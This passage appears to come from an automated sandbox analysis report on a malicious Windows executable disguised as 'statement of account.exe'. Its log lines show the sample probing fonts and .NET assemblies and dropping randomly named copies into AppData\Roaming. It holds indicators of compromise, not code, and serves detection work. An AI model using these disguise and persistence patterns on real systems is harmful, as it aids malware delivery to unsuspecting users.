                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Users\user\Desktop\statement of account.exe VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
